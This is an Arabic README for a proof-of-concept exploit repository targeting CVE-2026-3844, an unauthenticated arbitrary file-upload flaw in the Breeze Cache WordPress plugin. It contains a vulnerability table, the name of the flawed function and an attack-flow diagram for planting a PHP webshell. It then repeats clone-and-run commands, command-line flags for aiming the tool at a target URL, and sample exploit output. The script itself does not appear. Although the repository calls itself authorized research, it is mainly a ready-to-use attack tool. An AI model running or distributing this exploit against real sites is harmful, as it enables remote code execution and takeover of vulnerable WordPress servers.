
استغلال PoC لثغرة CVE-2026-3844، وهي ثغرة حرجة لرفع الملفات دون مصادقة في إضافة Breeze الخاصة بـ WordPress، تؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE).
استغلال لإثبات المفهوم (PoC) لـ CVE-2026-3844، وهي ثغرة حرجة لرفع الملفات بدون مصادقة في إضافة Breeze الخاصة بووردبريس تؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE).
CVE-2026-3844 هي ثغرة حرجة لرفع ملفات عشوائي بدون مصادقة في إضافة Breeze Cache لووردبريس (من Cloudways)، وتؤثر على جميع الإصدارات حتى 2.4.4 وما يتضمنه.
يوفر هذا المستودع استغلالًا لإثبات المفهوم (PoC) (CVE-2026-3844.py) للبحث الأمني المصرح به، واختبار الاختراق، والإفصاح المسؤول.
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3
| الحقل | التفاصيل |
|---|---|
| معرف CVE | CVE-2026-3844 |
| الإضافة | Breeze Cache (من Cloudways) |
| الإصدارات المتأثرة | جميع الإصدارات ≤ 2.4.4 |
| الإصدار المُصحَّح | Breeze 2.4.5+ |
| نوع الثغرة | CWE-434 — رفع ملف بدون قيود بنوع خطير |
| درجة CVSS v3.1 | 9.8 (حرجة) |
| درجة CVSS v2.0 | 10.0 (حرجة) |
| متجه CVSS | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| متجه الهجوم | شبكة (عن بُعد) |
| المصادقة المطلوبة | ❌ لا يوجد — بدون مصادقة |
| الشرط | يجب تفعيل خيار "Host Files Locally – Gravatars" (معطّل افتراضيًا) |
| التأثير | السرية: عالية · السلامة: عالية · التوفر: عالية |
| تاريخ النشر | 2026-04-23 |
| المصدر | Wordfence / NVD / MITRE |
| PoC | Tausif Zaman |
إضافة Breeze Cache لووردبريس تجلب صور Gravatar عن بُعد وتخزّنها محليًا عندما تكون ميزة "Host Files Locally – Gravatars" مفعّلة. الدالة المعرّضة للخطر fetch_gravatar_from_remote في class-breeze-cache-cronjobs.php (الأسطر 89–119) لا تُجري أي تحقق من نوع الملف أو امتداده على المحتوى الذي يتم جلبه عن بُعد.
class-breeze-cache-cronjobs.php
└── fetch_gravatar_from_remote() ← ❌ No file type validation
└── Saves remote content directly to disk
└── Attacker controls → uploads .php webshell → RCE
Attacker (Unauthenticated)
│
▼
Craft malicious HTTP request with PHP webshell URL as Gravatar
│
▼
Plugin fetches & saves the .php file without validation
│
▼
Webshell stored on server (e.g., /wp-content/breeze-cache/evil.php)
│
▼
Attacker accesses webshell → Full RCE achieved
في حال استغلال الثغرة بنجاح، يمكن للمهاجم أن:
requests# Clone the repository
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3 CVE-2026-3844.py
# Navigate into the directory
cd CVE-2026-3844
# Install dependencies
pip install -r requirements.txt
# Run the exploit
python3 CVE-2026-3844.py
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip install -r requirements.txt
python CVE-2026-3844.py
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip3 install -r requirements.txt
python3 CVE-2026-3844.py
pkg install python git -y && git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py
python3 CVE-2026-3844.py
usage: CVE-2026-3844.py [-h] -u URL [-t TIMEOUT] [-o OUTPUT] [-v]
CVE-2026-3844 — Breeze Cache WordPress Plugin Arbitrary File Upload PoC
optional arguments:
-h, --help Show this help message and exit
-u URL, --url URL Target URL (e.g. https://target.com)
-t TIMEOUT Request timeout in seconds (default: 10)
-o OUTPUT Save webshell path to output file
-v, --verbose Enable verbose/debug output
# Basic usage
python3 CVE-2026-3844.py -u https://vulnerable-site.com
# Verbose mode
python3 CVE-2026-3844.py -u https://vulnerable-site.com -v
# Custom timeout
python3 CVE-2026-3844.py -u https://vulnerable-site.com -t 20 -v
╔══════════════════════════════════════════════════════╗
║ CVE-2026-3844 | Breeze Cache WP RCE ║
║ Researcher: tausifzaman.online ║
╚══════════════════════════════════════════════════════╝
[*] Target : https://vulnerable-site.com
[*] CVE : CVE-2026-3844
[*] Plugin : Breeze Cache ≤ 2.4.4
[*] Type : Unauthenticated Arbitrary File Upload → RCE
[*] Checking target...